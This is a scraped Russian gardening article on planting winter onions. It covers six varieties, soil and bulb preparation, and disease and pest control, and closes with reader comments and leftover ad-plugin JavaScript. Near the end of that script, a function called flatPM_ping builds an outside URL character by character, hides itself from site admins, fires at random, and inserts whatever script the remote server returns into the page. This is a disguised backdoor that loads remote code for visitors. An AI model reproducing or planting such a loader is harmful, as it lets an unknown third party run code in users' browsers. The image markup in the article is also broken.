  • Пантер F1 – сорт японской селекции с бронзово-коричневой луковицей округлой формы и тонкой шейкой. Сорт устойчив к стрелкованию и холодостоек – выдерживает -28 ºC.

Озимый лук: описание вида и 6 популярных сортов

Одно время постоянно сажала лук под зиму, но сохранить урожай до весны не получалось. Но где то на форуме нашла совет — перед посадкой обрабатывать севок медным купоросом. Когда попробовала посадить такой посадочный материал, удивилась. Лук не только ничем не заболел, но и хранился до самого лета.

Подходит для коммерческого выращивания

Озимый лук — особенности вида:

  1. Не каждый сорт лука способен выдержать продолжительную зиму и крепкие морозы. Для озимой посадки подходят только некоторые сорта, которые могут формировать луковицу при коротком световом дне. Для зимней посадки севок должен соответствовать 2 условиям: диаметр луковицы должен быть меньше 1 см и каждая головка должна быть без повреждений и признаков заболеваний.
  2. Существует достаточно сортов лука для зимней посадки, обладающие рядом преимуществ. Они обладают ранним сроком созревания, дают возможность получить более крупные луковицы. А также при посадке лука в зиму можно получить перо на зелень на 2-3 недели раньше обычного лука.
  3. Не стоит забывать и о некоторых трудностях с которыми может столкнуться огородник. Это вымерзание посадочного материала, возможное стрелкование луковиц и плохая лежкость. Учитывая эти факторы, следует рассчитывать посадки и использовать выращенный лук до нового года.
  4. Большое количество сортов озимого лука принадлежит работе российских и голландских селекционеров. Они учли все особенности климатических условий и вывели гибриды устойчивые не только к низким температурам, но и короткому световому дню и хорошей сопротивляемости к болезням и вредителям.

На фото лук готовый к длительному хранению. Фото: zdorov-today.ru

Автор видеоролика рекомендует сажать озимый лук за 3 недели до заморозков. Главное, чтобы до зимы лук успел укорениться. Грядку следует замульчировать и в зиму прикрыть лапником:

6 популярных сортов

agronom.expert » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fd7167d91.jpg» alt=»table_pic_» w /> Шекспир

Описание:

  • скороспелый сорт, со сроком созревания 70-75 дней;
  • формирует крупные головки 100-300 г;
  • верхние чешуйки золотисто-коричневого цвета, мякоть белая, плотная, сочная с полуострым вкусом;
  • плотность прилегания слоев очень высокая, что позволяет выдерживать морозы до -30 градусов;
  • подходит для выращивания в средней полосе России и Сибири
klumba.guru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fd922fa74.jpeg» alt=»table_pic_» w /> Радар

Описание:

  • сорт голландской селекции с периодом созревания 85 дней;
  • зимний лук долго хранится и обладает отличными вкусовыми качествами;
  • репка покрыта сверху золотистой чешуей;
  • на разрезе мякоть белая, очень сочная, довольно плотная;
  • средняя масса луковицы составляет 150-350 г
seattlehelpers.org » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fdb8ee998.jpg» alt=»table_pic_» w /> Эллан

Описание:

  • скороспелый сорт, при хорошем уходе способен созреть уже к середине июня;
  • обладает выровненными головками массой 150 г с золотистой чешуей;
  • вкус сладкий, с легкой остротой, идеально подходит для приготовления свежих салатов;
  • из недостатков — короткий период хранения
magazinsemena.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fdc8740a9.jpg» alt=»table_pic_» w /> Центурион

Описание:

  • высокоурожайный сорт с длительным периодом хранения;
  • головки вытянутой формы, массой до 160 г;
  • вкус гармоничный, в меру острый;
  • мякоть плотная, сочная, набирает сладость после 3 месяцев хранения
superfb.site » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fe09a6964.jpg» alt=»table_pic_» w /> Штутгартер ризен

Описание:

  • сорт немецкой селекции, самый морозоустойчивый и довольно популярный в России;
  • золотистая с коричневыми полосками чешуя является визитной карточкой;
  • головки круглые, немного приплюснутые сверху и снизу могут достигать огромных размеров превышающих 300 г;
  • лук отлично хранится при условии хорошей просушки
dacha365.net » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fe21e97c8.jpg» alt=»table_pic_» w /> Стурон

Описание:

  • непревзойденный сладкий вкус без горчинки;
  • репка овальная с золотисто-коричневой чешуей;
  • плоды крупные, могут превышать 200 г;
  • хорошо хранится и устойчив к заболеваниям

Высаживать на солнечной стороне

ogorod-bez-hlopot.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fe3f09fa8.jpg» alt=»table_pic_» w /> Шаг 1. Подготовка грядки
  • для посадки озимого лука грядки следует располагать на солнечной стороне, где раньше тает снег;
  • в почву внести перегной, древесную золу и 1 ст.л суперфосфата на 1 кв.м;
  • перед посадкой проделать ряды глубиной 10 см и пролить их кипятком с марганцовкой
sovkusom.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fe515a4e4.jpg» alt=»table_pic_» w /> Шаг 2. Подготовка посадочного материала

  • для подзимних посевов произвести калибровку луковиц. Лучше всего для посадки подойдут головки до 1 см в диаметре;
  • для получения хороших головок необходимо 2 часа выдержать луковки в горячей воде (60 градусов), затем на 10 минут замочить в растворе медного купороса и просушить в течение 12 часов
vsem-privet.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fe71d0e11.jpg» alt=»table_pic_» w /> Шаг 3. Посадка

  • озимую посадку следует производить осенью за 3 недели до наступления морозов. В подготовленные ряды на расстоянии 5 см друг от друга посадить головки. Частая посадка, это гарантия хороших всходов даже при некотором вымерзании луковиц;
  • сверху ряды замульчировать перепревшими опилками или компостом, можно прикрыть соломой или лапником
1gryadka.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fe82d4407.jpg» alt=»table_pic_» w /> Шаг 4. Выращивание

  • весной необходимо освободить грядку от укрытия для быстрого прогревания почвы;
  • через 2 недели после появления всходов провести подкормку посадок азотными удобрениями;
  • 2 и 3 подкормки проводятся с перерывом в 3 недели комплексными минеральными удобрениями
zelenj.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fe9376269.jpg» alt=»table_pic_» w /> Шаг 5. Уборка и хранение

  • как только перо ляжет и начнет желтеть, лук пора убирать;
  • сбор урожая проводить в сухую солнечную погоду, оставляя овощи на грядке для просушивания или в хорошо проветриваемом помещении;
  • после того, как лук хорошо высохнет, его следует освободить от сухих частей и убрать на хранение в сухое помещение

Болезни и вредители

agrarii.com » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fea5508b5.jpg» alt=»table_pic_» w /> Фузариозная гниль

Способы борьбы:

  • соблюдать севооборот и высаживать лук после свеклы, горчицы, бобовых;
  • очищать землю от растительных остатков;
  • перед посадкой обрабатывать землю и посадочный материал;
  • обработать лук медьсодержащими препаратами
klopkan.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918febd41dc8.jpg» alt=»table_pic_» w /> Луковая муха

Способы борьбы:

  • высаживать рядом с посадками лука морковь;
  • обработать инсектицидами: Нексион, Фентиурам;
  • в качестве профилактики полить посадки соленой водой
seattlehelpers.org » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d918fed93de29.jpg» alt=»table_pic_» w /> Антракноз

Способы борьбы:

  • обрабатывать посевной материал перед посадкой;
  • обработать саженцы 80% раствором Купрозана или Дитана;
  • можно опрыскать грядки бордосской жидкостью и через 2 недели повторить обработку

Отзывы огородников

Галина П, Чеховский район

Два года сажаю лук под зиму. Мне нравится . Сажаю, как и чеснок, сантиметров на 8-10 и в то же время. Ничем не укрываю.

Лисенок

Что касается сортов: сорт «Радар» — озимый сорт, довольно ранний ; о сорте «Шекспир» слышала довольно много положительных отзывов.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};